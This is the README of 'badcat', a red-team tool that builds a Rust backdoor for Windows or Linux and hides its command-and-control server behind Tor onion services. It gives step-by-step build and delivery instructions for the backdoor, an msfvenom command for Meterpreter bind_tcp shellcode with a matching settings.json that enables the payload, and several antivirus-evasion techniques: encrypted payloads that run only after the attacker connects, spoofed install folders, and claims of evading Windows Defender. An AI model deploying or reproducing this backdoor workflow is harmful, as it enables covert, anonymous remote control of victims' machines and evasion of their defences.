This a tool intended to be used by Red Teams, in order to mimic APT (Advanced Persistent Threat) attacks. It hides the C2 (Command and Control) server by using Onion Services to masquerade attacker's real IP address.
The initial Proof of Concept is in the branch initial-poc. One will find there the first attempt to implement such idea. The initial PoC exists for historical reasons, and should only be used for testing.
attacker: conductor of the attack.
victim: the target machine of the attack.
backdoor: executable generated by the attacker and delivered to victim.
server: backdoor running Tor Onion Service on the victim.
- Tor is static linked against the backdoor. The need to create a new process for the Tor binary goes away.
- An in-house implementation to stablish Onion Service connections directly from the backdoor code. In other words, the need for a TCP server goes way with the in-memory server feature.
- This powerful in-memory server feature, allows one to develop a custom RPC Api with badcat orchestration without the need to open a socket. This may be extremely helpful for stealthy Command and Control engagements.
- Automatic Onion Service configuration using a configurable torrc template.
- Authentication to access the server.
- Optional use of payload (aka shellcode) in the backdoor, which is only executed once the attacker connects evading almost any Anti-Virus real time monitoring. When not using a payload, fallback to a basic shell.
- Execution of payload can be re-started many times from the attacker.
- XOR encryption of every sensible thing.
- Full rust source code.
So far I have only found ToRat as a good alternative.
I consider badcat to be a somewhat advanced alternative to ToRat. ToRat is a reasonably good Remote Administration tool using Tor as a transport mechanism and RPC for communication. There seems to have different goals between badcat and ToRat. The former focuses at creating an environment for shipping an anonymous and stealthy backdoor with user adaptable payload. On the other hand, ToRat tries to be an all-in-one solution, featuring among other things, util commands via RPC, cross-platform and multi-user persistence, code obfuscation.
Differently than ToRat, the server starts in the client and the attacker connects to the server, using the bind tcp approach. In the situation you are behind a Tor proxy and can't change Tor's configuration, this approach can be benefitial. Actually, I think most of the time, attackers does not use Tor alone because of well known attacks against stand-alone Tor instances. Generally Tails or Whonix inside a Virtual Machine or from a Live USB. In this more real world scenarios is convenient not to have to run Tor alone but just connect to it as a client, using a configuration file that is easy to move back and forth.
Also badcat supports arbitrary payload execution in order to allow quick generation of full-featured backdoors shipping a Meterpreter shellcode, for example.
To get started, one just need to configure the rust ecosystem, it's easy.
Follow the instructions to install rustup tool: https://www.rust-lang.org/tools/install.
Select the default installation. Rustup prepares your environment for cross-compilation and dependency management using cargo.
...
stable-x86_64-unknown-linux-gnu installed - rustc 1.56.1 (59eed8a2a 2021-11-01)
Rust is installed now. Great!
To get started you may need to restart your current shell.
This would reload your PATH environment variable to include
Cargo's bin directory ($HOME/.cargo/bin).
To configure your current shell, run:
source $HOME/.cargo/envNow restart your shell or execute the mentioned command above to configure your shell.
With the configured shell, run the following command to ensure rustup was installed with success:
$ rustup --version
rustup 1.24.3 (ce5817a94 2021-05-31)
info: This is the version for the rustup toolchain manager, not the rustc compiler.
info: The currently active `rustc` version is `rustc 1.56.1 (59eed8a2a 2021-11-01)`This quick example shows how to generate the backdoor for a Windows x64 machine using Fedora (Linux). Let's breakdown the steps to gain remote command execution into 4 steps.
The attacker toolkit is used to access victim's computer through the backdoor, you are able to use it anywhere as long as you have the hosts file. The hosts file describes each of your victim and how to get in touch with them.
$ cargo build --release -p attackerThe executable is at target/release/attacker.
We need to configure rust to target the Windows host.
$ rustup target add x86_64-pc-windows-gnu
$ rustup toolchain install stable-x86_64-pc-windows-gnuAnd one may get the following output:
error: DEPRECATED: future versions of rustup will require --force-non-host to install a non-host toolchain as the default.
warning: toolchain 'stable-x86_64-pc-windows-gnu' may not be able to run on this system.
warning: If you meant to build software to target that platform, perhaps try `rustup target add x86_64-pc-windows-gnu` instead?
info: syncing channel updates for 'stable-x86_64-pc-windows-gnu'
info: latest update on 2021-11-01, rust version 1.56.1 (59eed8a2a 2021-11-01)
info: downloading component 'cargo'
info: downloading component 'clippy'
info: downloading component 'rust-docs'
info: downloading component 'rust-mingw'
info: downloading component 'rust-std'
info: downloading component 'rustc'
info: downloading component 'rustfmt'
info: installing component 'cargo'
info: installing component 'clippy'
info: installing component 'rust-docs'
17.2 MiB / 17.2 MiB (100 %) 1.7 MiB/s in 8s ETA: 0s
info: installing component 'rust-mingw'
info: installing component 'rust-std'
31.4 MiB / 31.4 MiB (100 %) 9.7 MiB/s in 3s ETA: 0s
info: installing component 'rustc'
135.2 MiB / 135.2 MiB (100 %) 8.1 MiB/s in 16s ETA: 0s
info: installing component 'rustfmt'
6.2 MiB / 6.2 MiB (100 %) 6.2 MiB/s in 1s ETA: 0s
stable-x86_64-pc-windows-gnu installed - (rustc does not exist)
info: checking for self-updatesThe two commands above may take a few minutes to complete.
There are two last components to install, the Mingw GCC compiler and pthread static libraries. Lookup how to install Mingw and pthread for your Operating System, remember that we are targeting win64. Hint, on Fedora the package name is mingw64-gcc and mingw64-winpthreads-static, respectively.
Then ensure it's fully configured running:
$ x86_64-w64-mingw32-gcc --version
x86_64-w64-mingw32-gcc (GCC) 10.3.1 20210422 (Fedora MinGW 10.3.1-2.fc33)
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.The version shown may be different than yours.
Finally we are able to compile the backdoor. Every time you build a backdoor, badcat reads a configuration file with instructions. This configuration file must be at victim/settings.json but it's intended to be per-installation, so there is an example file at victim/settings.json.example.
Once you have created the configuration from the example, we are done to build the backdoor using the default configurations, which are the following:
- name of target host as
a host that knows you are hacking them. This name is used to identificate which machine to connect, so change them accordingly to keep yourself organized. - payload disabled, so badcat's basic shell will be used.
Build the backdoor targeting Windows x64:
$ cargo build -p victim --release --target=x86_64-pc-windows-gnuOnce completed, check the result file:
$ file target/x86_64-pc-windows-gnu/release/victim.exe
target/x86_64-pc-windows-gnu/release/victim.exe: PE32+ executable (GUI) x86-64, for MS WindowsThat seems fine. You may now had noticed that a new file called hosts.json was created. That is the configuration file used to connect to the victim using the attacker toolkit. It contains a list of host objects, so whenever you build a new backdoor the hosts.json is updated with the new host information.
Deliver the generated executable to the victim and execute it. The figure 1 shows the size of the backdoor and the date which Microsoft Windows Defender does not catch it.
Figure 1 - Windows screenshot of running backdoor
Now configure Tor at your attacker machine and connect to the victim through the attacker toolkit. The attacker toolkit already uses the default Tor socks address. The figure 2 presents the toolkit interface and the PowerShell opened for commands.
Figure 2 - Attacker toolkit connected to backdoor
You'll find in this topic advanced ways to accomplish better results compared to the simple quick usage example.
One of the advanced features of badcat is the ability to execute custom payload. Let me elaborate: one can inject a payload into executable memory and jump into it, just after the attacker connected to the server. So what kind of usefull payloads one might inject? Bind tcp ones. Badcat actually prepares a port on the server for you to use a bind tcp payload, you can set the payload to anything wanted though.
Examples:
Generate your payload and write the raw bytes to a file. Then enable payload at your settings.json and update them to reflect your payload and bind port - using port 4444 for the purpose of this example:
{
"name": "my custom shell",
"hosts_file": "../hosts.json",
"tor": {
"spoof_dir": {
"windows": "AppData\\Local\\Microsoft",
"linux": ".local/share/Trash/.repo"
},
"rc_file": "torrc",
},
"payload": {
"enabled": true,
"file": "MY-AWESOME-PAYLOAD.bin",
"bind_port": "4444"
}
}Note: Before compiling your backdoor and deliver as usual, ensure the build target is the right one for your payload. I mean, if you are using a Linux payload you could target Windows, but the payload would never execute properly.
When connecting, the attacker toolkit will execute the payload for you, but according to figure 3, nothing will really show up. Instead you'll be able to connect directly to your shell using the onion address and the port as settings.payload.bind_port - 4444 in our example.
Figure 3 - Attacker toolkit message about the payload
Using Meterpreter gives you a full-featured remote administration, but it's well known and blocked by most anti-viruses. With badcat, you evade - as far as I can tell - almost all anti-virus detection because you only decrypt and execute the payload after the attacker connects.
The steps to use a Meterpreter shellcode is exactly the same as in example 1.
Generate the shellcode as raw bytes with msfvenom:
$ msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f raw -o payload.binThen enable payload at your settings.json and update them to reflect your payload and bind port - using port 6666 for the purpose of this example:
{
"name": "my meterpreter",
"hosts_file": "../hosts.json",
"tor": {
"spoof_dir": {
"windows": "AppData\\Local\\Microsoft",
"linux": ".local/share/Trash/.repo"
},
"rc_file": "torrc",
},
"payload": {
"enabled": true,
"file": "../payload.bin",
"bind_port": "6666"
}
}Now compile your backdoor and deliver as usual.
In the moment the attacker connects and payload is going be executed on the victim, one may see the common Microsoft Windows Defender - useless - Alert, ilustrated on figure 4. This alert is extremelly generic, and users tend to ignore such alerts because it does not say it's a malware. But thats kind of funny that the payload was already executed and the port is listening in the background. And even if one does not Allow access, the payload keeps running and Windows does nothing about it.
Figure 4 - Microsoft Windows Defender Alert
After Canceling or Allowing access through Microsoft Windows Defender Alert, you are able to connect directly to your meterpreter session using the onion address and the port as settings.payload.bind_port 6666 in our example.
Fire up msfconsole - using proxychains or something similar - in order to open a meterpreter session through the Tor network. It's fundamental that msfconsole is proxied through the Tor network or one will not be able to connect to the server.
With msfconsole opened, configure a handler for your payload and exploit it.
Figure 5 - Meterpreter session opened through badcat
Read the full documentation at Tor.
Badcat lacks - by purpose - all the features available in famous softwares like metasploit. Therefore I started working into integrating badcat's functionality to a full-featured Remote Administration Tool. Read the full documentation at Pupy.